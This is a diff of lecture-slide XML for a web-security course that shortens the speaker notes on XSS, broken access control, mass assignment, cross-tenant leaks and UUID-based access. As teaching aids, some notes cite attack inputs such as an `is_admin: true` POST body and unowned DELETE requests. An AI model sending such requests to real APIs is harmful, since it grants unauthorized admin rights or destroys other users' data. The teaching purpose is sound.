-          <a:p>
-            <a:pPr marL="0" lvl="0" indent="0" algn="l" rtl="0">
-              <a:spcBef>
-                <a:spcPts val="0"/>
-              </a:spcBef>
-              <a:spcAft>
-                <a:spcPts val="0"/>
-              </a:spcAft>
-              <a:buNone/>
-            </a:pPr>
-            <a:r>
-              <a:rPr lang="en-US"/>
-              <a:t>Two secure-by-default patterns side by side. textContent is the DOM equivalent. JSX's curly-brace interpolation is the React version, and it auto-escapes by default. The 'dangerously' naming is really the React team doing what a good framework does, which is making the unsafe option loud enough that nobody reaches for it by accident. Anyone tempted to use it should read that word as a stop sign.</a:t>
-            </a:r>
-            <a:endParaRPr/>
-          </a:p>
+          <a:p/>
         </p:txBody>
       </p:sp>
       <p:sp>
@@ -4819,20 +4427,9 @@
           </a:bodyPr>
           <a:lstStyle/>
           <a:p>
-            <a:pPr marL="0" lvl="0" indent="0" algn="l" rtl="0">
-              <a:spcBef>
-                <a:spcPts val="0"/>
-              </a:spcBef>
-              <a:spcAft>
-                <a:spcPts val="0"/>
-              </a:spcAft>
-              <a:buNone/>
-            </a:pPr>
-            <a:r>
-              <a:rPr lang="en-US"/>
-              <a:t>This story is just fun and it lands the XSS mechanism perfectly. Worth walking through the propagation: each viewer's browser, with the viewer's cookies, made a request to MySpace that modified the viewer's own profile. That's the exponential - one infected profile produces N infected profiles produces N^2 - and 20 hours later it's a million. The CSS-with-javascript-URL trick is also a great example of why allowlist filters are hard: every renderer has weird corners, attackers find them. The fix is still 'escape on render', not 'better filter on storage.'</a:t>
-            </a:r>
-            <a:endParaRPr/>
+            <a:r>
+              <a:t>Walk propagation: viewer's browser, viewer's cookies, edits viewer's own profile. Filters fail, escape on render.</a:t>
+            </a:r>
           </a:p>
         </p:txBody>
       </p:sp>
@@ -4988,20 +4585,9 @@
           </a:bodyPr>
           <a:lstStyle/>
           <a:p>
-            <a:pPr marL="0" lvl="0" indent="0" algn="l" rtl="0">
-              <a:spcBef>
-                <a:spcPts val="0"/>
-              </a:spcBef>
-              <a:spcAft>
-                <a:spcPts val="0"/>
-              </a:spcAft>
-              <a:buNone/>
-            </a:pPr>
-            <a:r>
-              <a:rPr lang="en-US"/>
-              <a:t>This story is just fun and it lands the XSS mechanism perfectly. Worth walking through the propagation: each viewer's browser, with the viewer's cookies, made a request to MySpace that modified the viewer's own profile. That's the exponential - one infected profile produces N infected profiles produces N^2 - and 20 hours later it's a million. The CSS-with-javascript-URL trick is also a great example of why allowlist filters are hard: every renderer has weird corners, attackers find them. The fix is still 'escape on render', not 'better filter on storage.'</a:t>
-            </a:r>
-            <a:endParaRPr/>
+            <a:r>
+              <a:t>Walk propagation: viewer's browser, viewer's cookies, edits viewer's own profile. Filters fail, escape on render.</a:t>
+            </a:r>
           </a:p>
         </p:txBody>
       </p:sp>
@@ -5146,20 +4732,9 @@
           </a:bodyPr>
           <a:lstStyle/>
           <a:p>
-            <a:pPr marL="0" lvl="0" indent="0" algn="l" rtl="0">
-              <a:spcBef>
-                <a:spcPts val="0"/>
-              </a:spcBef>
-              <a:spcAft>
-                <a:spcPts val="0"/>
-              </a:spcAft>
-              <a:buNone/>
-            </a:pPr>
-            <a:r>
-              <a:rPr lang="en-US"/>
-              <a:t>This story is just fun and it lands the XSS mechanism perfectly. Worth walking through the propagation: each viewer's browser, with the viewer's cookies, made a request to MySpace that modified the viewer's own profile. That's the exponential - one infected profile produces N infected profiles produces N^2 - and 20 hours later it's a million. The CSS-with-javascript-URL trick is also a great example of why allowlist filters are hard: every renderer has weird corners, attackers find them. The fix is still 'escape on render', not 'better filter on storage.'</a:t>
-            </a:r>
-            <a:endParaRPr/>
+            <a:r>
+              <a:t>Walk propagation: viewer's browser, viewer's cookies, edits viewer's own profile. Filters fail, escape on render.</a:t>
+            </a:r>
           </a:p>
         </p:txBody>
       </p:sp>
@@ -5303,22 +4878,7 @@
             <a:noAutofit/>
           </a:bodyPr>
           <a:lstStyle/>
-          <a:p>
-            <a:pPr marL="0" lvl="0" indent="0" algn="l" rtl="0">
-              <a:spcBef>
-                <a:spcPts val="0"/>
-              </a:spcBef>
-              <a:spcAft>
-                <a:spcPts val="0"/>
-              </a:spcAft>
-              <a:buNone/>
-            </a:pPr>
-            <a:r>
-              <a:rPr lang="en-US"/>
-              <a:t>A really common source of security bugs. Two distinct questions that sound almost identical, both important, and easy to conflate.</a:t>
-            </a:r>
-            <a:endParaRPr/>
-          </a:p>
+          <a:p/>
         </p:txBody>
       </p:sp>
       <p:sp>
@@ -5461,22 +5021,7 @@
             <a:noAutofit/>
           </a:bodyPr>
           <a:lstStyle/>
-          <a:p>
-            <a:pPr marL="0" lvl="0" indent="0" algn="l" rtl="0">
-              <a:spcBef>
-                <a:spcPts val="0"/>
-              </a:spcBef>
-              <a:spcAft>
-                <a:spcPts val="0"/>
-              </a:spcAft>
-              <a:buNone/>
-            </a:pPr>
-            <a:r>
-              <a:rPr lang="en-US"/>
-              <a:t>The authz bug is really the easy one to write. It's natural to check that the user is logged in and then stop there, without also checking that the logged-in user actually owns the thing they're modifying...that second check is the one that's easy to drop. Cover it explicitly so it doesn't slip into the final project.</a:t>
-            </a:r>
-            <a:endParaRPr/>
-          </a:p>
+          <a:p/>
         </p:txBody>
       </p:sp>
       <p:sp>
@@ -5620,48 +5165,9 @@
           </a:bodyPr>
           <a:lstStyle/>
           <a:p>
-            <a:pPr marL="0" lvl="0" indent="0" algn="l" rtl="0">
-              <a:spcBef>
-                <a:spcPts val="0"/>
-              </a:spcBef>
-              <a:spcAft>
-                <a:spcPts val="0"/>
-              </a:spcAft>
-              <a:buNone/>
-            </a:pPr>
-            <a:r>
-              <a:rPr lang="en-US"/>
-              <a:t># The authentication check ran. The user is definitely logged in.</a:t>
-            </a:r>
-            <a:endParaRPr/>
-          </a:p>
-          <a:p>
-            <a:pPr marL="0" lvl="0" indent="0" algn="l" rtl="0">
-              <a:spcBef>
-                <a:spcPts val="0"/>
-              </a:spcBef>
-              <a:spcAft>
-                <a:spcPts val="0"/>
-              </a:spcAft>
-              <a:buNone/>
-            </a:pPr>
-            <a:r>
-              <a:rPr lang="en-US"/>
-              <a:t># What's wrong here?</a:t>
-            </a:r>
-            <a:endParaRPr/>
-          </a:p>
-          <a:p>
-            <a:pPr marL="0" lvl="0" indent="0" algn="l" rtl="0">
-              <a:spcBef>
-                <a:spcPts val="0"/>
-              </a:spcBef>
-              <a:spcAft>
-                <a:spcPts val="0"/>
-              </a:spcAft>
-              <a:buNone/>
-            </a:pPr>
-            <a:endParaRPr/>
+            <a:r>
+              <a:t>Answer: no ownership check, any logged-in user reads any message by id.</a:t>
+            </a:r>
           </a:p>
         </p:txBody>
       </p:sp>
@@ -5806,20 +5312,9 @@
           </a:bodyPr>
           <a:lstStyle/>
           <a:p>
-            <a:pPr marL="0" lvl="0" indent="0" algn="l" rtl="0">
-              <a:spcBef>
-                <a:spcPts val="0"/>
-              </a:spcBef>
-              <a:spcAft>
-                <a:spcPts val="0"/>
-              </a:spcAft>
-              <a:buNone/>
-            </a:pPr>
-            <a:r>
-              <a:rPr lang="en-US"/>
-              <a:t>Call out both fixes. First: the ownership check goes INSIDE the WHERE clause, not as a Python `if` after the fetch - doing it in Python pulls the row into memory and tempts you to leak partial fields. Second: 404 not 403. If you return 403 'forbidden' for messages that exist and 404 'not found' for messages that don't, the attacker can enumerate which message IDs exist just from response codes. Same response for both cases. This is a small thing that real bug bounties pay out for routinely.</a:t>
-            </a:r>
-            <a:endParaRPr/>
+            <a:r>
+              <a:t>Ask for the fix first. Two parts: ownership inside the WHERE, 404 for both cases.</a:t>
+            </a:r>
           </a:p>
         </p:txBody>
       </p:sp>
@@ -5964,20 +5459,9 @@
           </a:bodyPr>
           <a:lstStyle/>
           <a:p>
-            <a:pPr marL="0" lvl="0" indent="0" algn="l" rtl="0">
-              <a:spcBef>
-                <a:spcPts val="0"/>
-              </a:spcBef>
-              <a:spcAft>
-                <a:spcPts val="0"/>
-              </a:spcAft>
-              <a:buNone/>
-            </a:pPr>
-            <a:r>
-              <a:rPr lang="en-US"/>
-              <a:t>Call out both fixes. First: the ownership check goes INSIDE the WHERE clause, not as a Python `if` after the fetch - doing it in Python pulls the row into memory and tempts you to leak partial fields. Second: 404 not 403. If you return 403 'forbidden' for messages that exist and 404 'not found' for messages that don't, the attacker can enumerate which message IDs exist just from response codes. Same response for both cases. This is a small thing that real bug bounties pay out for routinely.</a:t>
-            </a:r>
-            <a:endParaRPr/>
+            <a:r>
+              <a:t>Python `if` after the fetch tempts partial-field leaks. Bug bounties pay for 403/404 enumeration.</a:t>
+            </a:r>
           </a:p>
         </p:txBody>
       </p:sp>
@@ -6122,58 +5606,9 @@
           </a:bodyPr>
           <a:lstStyle/>
           <a:p>
-            <a:pPr marL="0" lvl="0" indent="0" algn="l" rtl="0">
-              <a:spcBef>
-                <a:spcPts val="0"/>
-              </a:spcBef>
-              <a:spcAft>
-                <a:spcPts val="0"/>
-              </a:spcAft>
-              <a:buNone/>
-            </a:pPr>
-            <a:r>
-              <a:rPr lang="en-US"/>
-              <a:t># The frontend's settings page only shows fields for name, bio,</a:t>
-            </a:r>
-            <a:endParaRPr/>
-          </a:p>
-          <a:p>
-            <a:pPr marL="0" lvl="0" indent="0" algn="l" rtl="0">
-              <a:spcBef>
-                <a:spcPts val="0"/>
-              </a:spcBef>
-              <a:spcAft>
-                <a:spcPts val="0"/>
-              </a:spcAft>
-              <a:buNone/>
-            </a:pPr>
-            <a:r>
-              <a:rPr lang="en-US"/>
-              <a:t># and avatar. No admin checkbox. What's wrong?</a:t>
-            </a:r>
-            <a:endParaRPr/>
-          </a:p>
-          <a:p>
-            <a:pPr marL="0" lvl="0" indent="0" algn="l" rtl="0">
-              <a:spcBef>
-                <a:spcPts val="0"/>
-              </a:spcBef>
-              <a:spcAft>
-                <a:spcPts val="0"/>
-              </a:spcAft>
-              <a:buNone/>
-            </a:pPr>
-            <a:br>
-              <a:rPr lang="en-US"/>
-            </a:br>
-            <a:br>
-              <a:rPr lang="en-US"/>
-            </a:br>
-            <a:r>
-              <a:rPr lang="en-US"/>
-              <a:t>Two bugs in this one, and either is fatal. The big one: `is_admin` is in the request schema, so a hand-crafted POST body that includes `is_admin: true` promotes the attacker to admin. The frontend hiding the checkbox does NOT hide the field from the API. Anyone with curl can send `{"is_admin": true}` and Pydantic happily accepts it and the loop happily writes it. Bonus bug: the f-string on the column name is also SQL injection (the column name isn't a parameter, it's structural) - mention it if students spot it, otherwise leave it for next time. The headline lesson here is mass assignment: never accept a request body that contains fields the user is not allowed to set.</a:t>
-            </a:r>
-            <a:endParaRPr/>
+            <a:r>
+              <a:t>Answer: mass assignment, `{"is_admin": true}` via curl. If spotted: f-string column name is injection too.</a:t>
+            </a:r>
           </a:p>
         </p:txBody>
       </p:sp>
@@ -6317,22 +5752,7 @@
             <a:noAutofit/>
           </a:bodyPr>
           <a:lstStyle/>
-          <a:p>
-            <a:pPr marL="0" lvl="0" indent="0" algn="l" rtl="0">
-              <a:spcBef>
-                <a:spcPts val="0"/>
-              </a:spcBef>
-              <a:spcAft>
-                <a:spcPts val="0"/>
-              </a:spcAft>
-              <a:buNone/>
-            </a:pPr>
-            <a:r>
-              <a:rPr lang="en-US"/>
-              <a:t>The definitional framing really matters here. It's easy to think of a FastAPI endpoint as just 'a function that gets called', and the shift today is to think of it as a function that gets called by someone you don't trust. Same functions, same code, very different mindset...that shift is most of what the lecture is trying to do.</a:t>
-            </a:r>
-            <a:endParaRPr/>
-          </a:p>
+          <a:p/>
         </p:txBody>
       </p:sp>
       <p:sp>
@@ -6476,58 +5896,9 @@
           </a:bodyPr>
           <a:lstStyle/>
           <a:p>
-            <a:pPr marL="0" lvl="0" indent="0" algn="l" rtl="0">
-              <a:spcBef>
-                <a:spcPts val="0"/>
-              </a:spcBef>
-              <a:spcAft>
-                <a:spcPts val="0"/>
-              </a:spcAft>
-              <a:buNone/>
-            </a:pPr>
-            <a:r>
-              <a:rPr lang="en-US"/>
-              <a:t># The frontend's settings page only shows fields for name, bio,</a:t>
-            </a:r>
-            <a:endParaRPr/>
-          </a:p>
-          <a:p>
-            <a:pPr marL="0" lvl="0" indent="0" algn="l" rtl="0">
-              <a:spcBef>
-                <a:spcPts val="0"/>
-              </a:spcBef>
-              <a:spcAft>
-                <a:spcPts val="0"/>
-              </a:spcAft>
-              <a:buNone/>
-            </a:pPr>
-            <a:r>
-              <a:rPr lang="en-US"/>
-              <a:t># and avatar. No admin checkbox. What's wrong?</a:t>
-            </a:r>
-            <a:endParaRPr/>
-          </a:p>
-          <a:p>
-            <a:pPr marL="0" lvl="0" indent="0" algn="l" rtl="0">
-              <a:spcBef>
-                <a:spcPts val="0"/>
-              </a:spcBef>
-              <a:spcAft>
-                <a:spcPts val="0"/>
-              </a:spcAft>
-              <a:buNone/>
-            </a:pPr>
-            <a:br>
-              <a:rPr lang="en-US"/>
-            </a:br>
-            <a:br>
-              <a:rPr lang="en-US"/>
-            </a:br>
-            <a:r>
-              <a:rPr lang="en-US"/>
-              <a:t>Two bugs in this one, and either is fatal. The big one: `is_admin` is in the request schema, so a hand-crafted POST body that includes `is_admin: true` promotes the attacker to admin. The frontend hiding the checkbox does NOT hide the field from the API. Anyone with curl can send `{"is_admin": true}` and Pydantic happily accepts it and the loop happily writes it. Bonus bug: the f-string on the column name is also SQL injection (the column name isn't a parameter, it's structural) - mention it if students spot it, otherwise leave it for next time. The headline lesson here is mass assignment: never accept a request body that contains fields the user is not allowed to set.</a:t>
-            </a:r>
-            <a:endParaRPr/>
+            <a:r>
+              <a:t>Answer: mass assignment, `{"is_admin": true}` via curl. If spotted: f-string column name is injection too.</a:t>
+            </a:r>
           </a:p>
         </p:txBody>
       </p:sp>
@@ -6672,20 +6043,9 @@
           </a:bodyPr>
           <a:lstStyle/>
           <a:p>
-            <a:pPr marL="0" lvl="0" indent="0" algn="l" rtl="0">
-              <a:spcBef>
-                <a:spcPts val="0"/>
-              </a:spcBef>
-              <a:spcAft>
-                <a:spcPts val="0"/>
-              </a:spcAft>
-              <a:buNone/>
-            </a:pPr>
-            <a:r>
-              <a:rPr lang="en-US"/>
-              <a:t>Two-models pattern is the secure-by-default move. Sensitive fields don't live in the same schema as user-editable ones, so it's not possible to accidentally accept them. Admin operations get a separate endpoint with a separate dependency that raises 403 on non-admins. Walk through `require_admin` briefly - it's just a FastAPI dependency that checks `user.is_admin` and raises HTTPException(403) if not. Composes with `current_user` so you get authn+authz in one declaration.</a:t>
-            </a:r>
-            <a:endParaRPr/>
+            <a:r>
+              <a:t>Ask for the fix: separate schema without is_admin, admin endpoint with its own dependency.</a:t>
+            </a:r>
           </a:p>
         </p:txBody>
       </p:sp>
@@ -6830,20 +6190,9 @@
           </a:bodyPr>
           <a:lstStyle/>
           <a:p>
-            <a:pPr marL="0" lvl="0" indent="0" algn="l" rtl="0">
-              <a:spcBef>
-                <a:spcPts val="0"/>
-              </a:spcBef>
-              <a:spcAft>
-                <a:spcPts val="0"/>
-              </a:spcAft>
-              <a:buNone/>
-            </a:pPr>
-            <a:r>
-              <a:rPr lang="en-US"/>
-              <a:t>Two-models pattern is the secure-by-default move. Sensitive fields don't live in the same schema as user-editable ones, so it's not possible to accidentally accept them. Admin operations get a separate endpoint with a separate dependency that raises 403 on non-admins. Walk through `require_admin` briefly - it's just a FastAPI dependency that checks `user.is_admin` and raises HTTPException(403) if not. Composes with `current_user` so you get authn+authz in one declaration.</a:t>
-            </a:r>
-            <a:endParaRPr/>
+            <a:r>
+              <a:t>`require_admin` is a dependency checking `user.is_admin`, raises 403, composes with `current_user`.</a:t>
+            </a:r>
           </a:p>
         </p:txBody>
       </p:sp>
@@ -6988,20 +6337,9 @@
           </a:bodyPr>
           <a:lstStyle/>
           <a:p>
-            <a:pPr marL="0" lvl="0" indent="0" algn="l" rtl="0">
-              <a:spcBef>
-                <a:spcPts val="0"/>
-              </a:spcBef>
-              <a:spcAft>
-                <a:spcPts val="0"/>
-              </a:spcAft>
-              <a:buNone/>
-            </a:pPr>
-            <a:r>
-              <a:rPr lang="en-US"/>
-              <a:t>Two bugs that compound. First: user_id is read from the URL path but never checked against the logged-in user. Attacker requests `DELETE /users/999/posts/100` and the user_id parameter is ignored entirely - it's decorative. Second: the DELETE itself doesn't check post ownership at all, just deletes by id. Combined, any logged-in user can delete any post in the database with `DELETE /users/&lt;anything&gt;/posts/&lt;id&gt;`. Key teaching point is that the frontend's URL construction is not a security boundary of any kind - an attacker isn't going through your frontend at all, they're sitting there with curl.</a:t>
-            </a:r>
-            <a:endParaRPr/>
+            <a:r>
+              <a:t>Answer: user_id never read, DELETE has no ownership clause. Attacker uses curl, never your frontend.</a:t>
+            </a:r>
           </a:p>
         </p:txBody>
       </p:sp>
@@ -7146,20 +6484,9 @@
           </a:bodyPr>
           <a:lstStyle/>
           <a:p>
-            <a:pPr marL="0" lvl="0" indent="0" algn="l" rtl="0">
-              <a:spcBef>
-                <a:spcPts val="0"/>
-              </a:spcBef>
-              <a:spcAft>
-                <a:spcPts val="0"/>
-              </a:spcAft>
-              <a:buNone/>
-            </a:pPr>
-            <a:r>
-              <a:rPr lang="en-US"/>
-              <a:t>Three fixes here, walk through each. (1) The URL shape changes - no more `/users/{user_id}/...` prefix, because the user is already identified by the auth token; putting it in the URL invites the trust-the-path bug. (2) The WHERE clause includes `author_id = :uid` so the DELETE only fires on the user's own posts. (3) Check `rowcount` and 404 if it was zero - otherwise the endpoint silently returns 200 'ok' even when nothing happened, which makes this kind of bug really hard to detect. Same principle as exercise #1: ownership goes INSIDE the query, and missing-vs-forbidden look identical from the outside.</a:t>
-            </a:r>
-            <a:endParaRPr/>
+            <a:r>
+              <a:t>Ask for fixes, three: drop user_id from URL, author_id in WHERE, check rowcount.</a:t>
+            </a:r>
           </a:p>
         </p:txBody>
       </p:sp>
@@ -7304,46 +6631,9 @@
           </a:bodyPr>
           <a:lstStyle/>
           <a:p>
-            <a:pPr marL="0" lvl="0" indent="0" algn="l" rtl="0">
-              <a:spcBef>
-                <a:spcPts val="0"/>
-              </a:spcBef>
-              <a:spcAft>
-                <a:spcPts val="0"/>
-              </a:spcAft>
-              <a:buNone/>
-            </a:pPr>
-            <a:r>
-              <a:rPr lang="en-US"/>
-              <a:t># If the post doesn't exist OR isn't theirs, both look like 404.</a:t>
-            </a:r>
-            <a:endParaRPr/>
-          </a:p>
-          <a:p>
-            <a:pPr marL="0" lvl="0" indent="0" algn="l" rtl="0">
-              <a:spcBef>
-                <a:spcPts val="0"/>
-              </a:spcBef>
-              <a:spcAft>
-                <a:spcPts val="0"/>
-              </a:spcAft>
-              <a:buNone/>
-            </a:pPr>
-            <a:r>
-              <a:rPr lang="en-US"/>
-              <a:t># rowcount of 1 = success. rowcount of 0 = nothing happened.</a:t>
-            </a:r>
-            <a:br>
-              <a:rPr lang="en-US"/>
-            </a:br>
-            <a:br>
-              <a:rPr lang="en-US"/>
-            </a:br>
-            <a:r>
-              <a:rPr lang="en-US"/>
-              <a:t>Three fixes here, walk through each. (1) The URL shape changes - no more `/users/{user_id}/...` prefix, because the user is already identified by the auth token; putting it in the URL invites the trust-the-path bug. (2) The WHERE clause includes `author_id = :uid` so the DELETE only fires on the user's own posts. (3) Check `rowcount` and 404 if it was zero - otherwise the endpoint silently returns 200 'ok' even when nothing happened, which makes this kind of bug really hard to detect. Same principle as exercise #1: ownership goes INSIDE the query, and missing-vs-forbidden look identical from the outside.</a:t>
-            </a:r>
-            <a:endParaRPr/>
+            <a:r>
+              <a:t>Without the rowcount check, the endpoint returns 200 when nothing was deleted.</a:t>
+            </a:r>
           </a:p>
         </p:txBody>
       </p:sp>
@@ -7488,64 +6778,9 @@
           </a:bodyPr>
           <a:lstStyle/>
           <a:p>
-            <a:pPr marL="0" lvl="0" indent="0" algn="l" rtl="0">
-              <a:spcBef>
-                <a:spcPts val="0"/>
-              </a:spcBef>
-              <a:spcAft>
-                <a:spcPts val="0"/>
-              </a:spcAft>
-              <a:buNone/>
-            </a:pPr>
-            <a:r>
-              <a:rPr lang="en-US"/>
-              <a:t># The membership check passes only for orgs you belong to.</a:t>
-            </a:r>
-            <a:endParaRPr/>
-          </a:p>
-          <a:p>
-            <a:pPr marL="0" lvl="0" indent="0" algn="l" rtl="0">
-              <a:spcBef>
-                <a:spcPts val="0"/>
-              </a:spcBef>
-              <a:spcAft>
-                <a:spcPts val="0"/>
-              </a:spcAft>
-              <a:buNone/>
-            </a:pPr>
-            <a:r>
-              <a:rPr lang="en-US"/>
-              <a:t># So this is locked down, right?</a:t>
-            </a:r>
-            <a:endParaRPr/>
-          </a:p>
-          <a:p>
-            <a:pPr marL="0" lvl="0" indent="0" algn="l" rtl="0">
-              <a:spcBef>
-                <a:spcPts val="0"/>
-              </a:spcBef>
-              <a:spcAft>
-                <a:spcPts val="0"/>
-              </a:spcAft>
-              <a:buNone/>
-            </a:pPr>
-            <a:endParaRPr/>
-          </a:p>
-          <a:p>
-            <a:pPr marL="0" lvl="0" indent="0" algn="l" rtl="0">
-              <a:spcBef>
-                <a:spcPts val="0"/>
-              </a:spcBef>
-              <a:spcAft>
-                <a:spcPts val="0"/>
-              </a:spcAft>
-              <a:buNone/>
-            </a:pPr>
-            <a:r>
-              <a:rPr lang="en-US"/>
-              <a:t>This is the subtle one and it's a real, common, dangerous bug - cross-tenant data leak. The authorization check is present AND correct: it verifies you're a member of org_id. The bug is that it authorizes the CONTAINER (the org) but the action touches the ITEM (the invoice), and nothing ties the invoice back to the org. So a member of org 5 (which they legitimately belong to) requests /orgs/5/invoices/9999 where invoice 9999 belongs to org 200. Membership check passes - they really are in org 5. Invoice fetch ignores the org entirely. They just read another company's invoice. This is how multi-tenant SaaS apps leak across customers, and it's a favorite of bug-bounty hunters. The lesson to say out loud is that you authorize the thing you're actually touching, rather than the container it happens to sit in.</a:t>
-            </a:r>
-            <a:endParaRPr/>
+            <a:r>
+              <a:t>Answer: check authorizes the org, fetch ignores it. Org 5 member reads org 200's invoice.</a:t>
+            </a:r>
           </a:p>
         </p:txBody>
       </p:sp>
@@ -7690,96 +6925,9 @@
           </a:bodyPr>
           <a:lstStyle/>
           <a:p>
-            <a:pPr marL="0" lvl="0" indent="0" algn="l" rtl="0">
-              <a:spcBef>
-                <a:spcPts val="0"/>
-              </a:spcBef>
-              <a:spcAft>
-                <a:spcPts val="0"/>
-              </a:spcAft>
-              <a:buNone/>
-            </a:pPr>
-            <a:r>
-              <a:rPr lang="en-US"/>
-              <a:t># Now an invoice that isn't in your org reads as 404, even</a:t>
-            </a:r>
-            <a:endParaRPr/>
-          </a:p>
-          <a:p>
-            <a:pPr marL="0" lvl="0" indent="0" algn="l" rtl="0">
-              <a:spcBef>
-                <a:spcPts val="0"/>
-              </a:spcBef>
-              <a:spcAft>
-                <a:spcPts val="0"/>
-              </a:spcAft>
-              <a:buNone/>
-            </a:pPr>
-            <a:r>
-              <a:rPr lang="en-US"/>
-              <a:t># though you passed the membership check. The authorization</a:t>
-            </a:r>
-            <a:endParaRPr/>
-          </a:p>
-          <a:p>
-            <a:pPr marL="0" lvl="0" indent="0" algn="l" rtl="0">
-              <a:spcBef>
-                <a:spcPts val="0"/>
-              </a:spcBef>
-              <a:spcAft>
-                <a:spcPts val="0"/>
-              </a:spcAft>
-              <a:buNone/>
-            </a:pPr>
-            <a:r>
-              <a:rPr lang="en-US"/>
-              <a:t># follows the data, not the URL structure. The rule:</a:t>
-            </a:r>
-            <a:endParaRPr/>
-          </a:p>
-          <a:p>
-            <a:pPr marL="0" lvl="0" indent="0" algn="l" rtl="0">
-              <a:spcBef>
-                <a:spcPts val="0"/>
-              </a:spcBef>
-              <a:spcAft>
-                <a:spcPts val="0"/>
-              </a:spcAft>
-              <a:buNone/>
-            </a:pPr>
-            <a:r>
-              <a:rPr lang="en-US"/>
-              <a:t># authorize the object you touch, not its parent.</a:t>
-            </a:r>
-            <a:endParaRPr/>
-          </a:p>
-          <a:p>
-            <a:pPr marL="0" lvl="0" indent="0" algn="l" rtl="0">
-              <a:spcBef>
-                <a:spcPts val="0"/>
-              </a:spcBef>
-              <a:spcAft>
-                <a:spcPts val="0"/>
-              </a:spcAft>
-              <a:buNone/>
-            </a:pPr>
-            <a:endParaRPr/>
-          </a:p>
-          <a:p>
-            <a:pPr marL="0" lvl="0" indent="0" algn="l" rtl="0">
-              <a:spcBef>
-                <a:spcPts val="0"/>
-              </a:spcBef>
-              <a:spcAft>
-                <a:spcPts val="0"/>
-              </a:spcAft>
-              <a:buNone/>
-            </a:pPr>
-            <a:r>
-              <a:rPr lang="en-US"/>
-              <a:t>Drive home that the fix is to make the ownership relationship explicit in the query that fetches the item: AND org_id = :org. The membership check and the item fetch have to agree on the same scope. A useful framing: any time a URL has nested ids (/parent/{a}/child/{b}), ask whether the code actually verifies child b belongs to parent a. Most of the time, when this bug exists, it doesn't. This is OWASP's #1 category (Broken Access Control) and the single most-reported bug class in bug bounties.</a:t>
-            </a:r>
-            <a:endParaRPr/>
+            <a:r>
+              <a:t>Nested ids /parent/{a}/child/{b}: does code verify b belongs to a? OWASP #1, Broken Access Control.</a:t>
+            </a:r>
           </a:p>
         </p:txBody>
       </p:sp>
@@ -7924,20 +7072,9 @@
           </a:bodyPr>
           <a:lstStyle/>
           <a:p>
-            <a:pPr marL="0" lvl="0" indent="0" algn="l" rtl="0">
-              <a:spcBef>
-                <a:spcPts val="0"/>
-              </a:spcBef>
-              <a:spcAft>
-                <a:spcPts val="0"/>
-              </a:spcAft>
-              <a:buNone/>
-            </a:pPr>
-            <a:r>
-              <a:rPr lang="en-US"/>
-              <a:t>The misconception here is one that real engineers hold: 'the identifier is unguessable, therefore knowing it implies authorization.' That's security through obscurity, and it fails because unguessable is not the same as secret. UUIDs leak constantly: they show up in shared links, in Referer headers when the page loads a third-party resource, in server logs, in browser history, in the URL bar over someone's shoulder, in a doc-list endpoint that returns everyone's uuids, in an email someone forwards. The moment anyone who shouldn't have access sees the UUID - a former collaborator, a contractor whose access was revoked, anyone the link was forwarded to - they have permanent access, because the only gate was knowing the string. Random IDs are a fine idea (they prevent enumeration) but they are NOT an authorization mechanism.</a:t>
-            </a:r>
-            <a:endParaRPr/>
+            <a:r>
+              <a:t>Answer: knowing the uuid is the only check. Leaks via shared links, Referer, logs, email.</a:t>
+            </a:r>
           </a:p>
         </p:txBody>
       </p:sp>
@@ -8082,20 +7219,9 @@
           </a:bodyPr>
           <a:lstStyle/>
           <a:p>
-            <a:pPr marL="0" lvl="0" indent="0" algn="l" rtl="0">
-              <a:spcBef>
-                <a:spcPts val="0"/>
-              </a:spcBef>
-              <a:spcAft>
-                <a:spcPts val="0"/>
-              </a:spcAft>
-              <a:buNone/>
-            </a:pPr>
-            <a:r>
-              <a:rPr lang="en-US"/>
-              <a:t>The fix restores a real authorization check: the user must be the owner OR appear in a shares table. Crucially, this makes revocation actually work - delete the share row and the contractor loses access immediately, regardless of whether they saved the uuid. The take-home: unguessable identifiers are a defense against enumeration (a nice complement to the /messages fix from bug #1), but they are never a substitute for an authorization check. If knowing a string is the only thing standing between an attacker and the data, you have a secret, not an access control system - and secrets in URLs do not stay secret.</a:t>
-            </a:r>
-            <a:endParaRPr/>
+            <a:r>
+              <a:t>Ask for the fix: owner or shares-table row, so revoking a share ends access.</a:t>
+            </a:r>
           </a:p>
         </p:txBody>
       </p:sp>
@@ -8239,22 +7365,7 @@
             <a:noAutofit/>
           </a:bodyPr>
           <a:lstStyle/>
-          <a:p>
-            <a:pPr marL="0" lvl="0" indent="0" algn="l" rtl="0">
-              <a:spcBef>
-                <a:spcPts val="0"/>
-              </a:spcBef>
-              <a:spcAft>
-                <a:spcPts val="0"/>
-              </a:spcAft>
-              <a:buNone/>
-            </a:pPr>
-            <a:r>
-              <a:rPr lang="en-US"/>
-              <a:t>The definitional framing really matters here. It's easy to think of a FastAPI endpoint as just 'a function that gets called', and the shift today is to think of it as a function that gets called by someone you don't trust. Same functions, same code, very different mindset...that shift is most of what the lecture is trying to do.</a:t>
-            </a:r>
-            <a:endParaRPr/>
-          </a:p>
+          <a:p/>
         </p:txBody>
       </p:sp>
       <p:sp>
@@ -8398,55 +7509,9 @@
           </a:bodyPr>
           <a:lstStyle/>
           <a:p>
-            <a:pPr marL="0" lvl="0" indent="0" algn="l" rtl="0">
-              <a:spcBef>
-                <a:spcPts val="0"/>
-              </a:spcBef>
-              <a:spcAft>
-                <a:spcPts val="0"/>
-              </a:spcAft>
-              <a:buNone/>
-            </a:pPr>
-            <a:r>
-              <a:rPr lang="en-US"/>
-              <a:t># Owner OR explicitly-shared. Revoke a share -&gt; access ends,</a:t>
-            </a:r>
-            <a:endParaRPr/>
-          </a:p>
-          <a:p>
-            <a:pPr marL="0" lvl="0" indent="0" algn="l" rtl="0">
-              <a:spcBef>
-                <a:spcPts val="0"/>
-              </a:spcBef>
-              <a:spcAft>
-                <a:spcPts val="0"/>
-              </a:spcAft>
-              <a:buNone/>
-            </a:pPr>
-            <a:r>
-              <a:rPr lang="en-US"/>
-              <a:t># even though the contractor still knows the uuid.</a:t>
-            </a:r>
-            <a:endParaRPr/>
-          </a:p>
-          <a:p>
-            <a:pPr marL="0" lvl="0" indent="0" algn="l" rtl="0">
-              <a:spcBef>
-                <a:spcPts val="0"/>
-              </a:spcBef>
-              <a:spcAft>
-                <a:spcPts val="0"/>
-              </a:spcAft>
-              <a:buNone/>
-            </a:pPr>
-            <a:br>
-              <a:rPr lang="en-US"/>
-            </a:br>
-            <a:r>
-              <a:rPr lang="en-US"/>
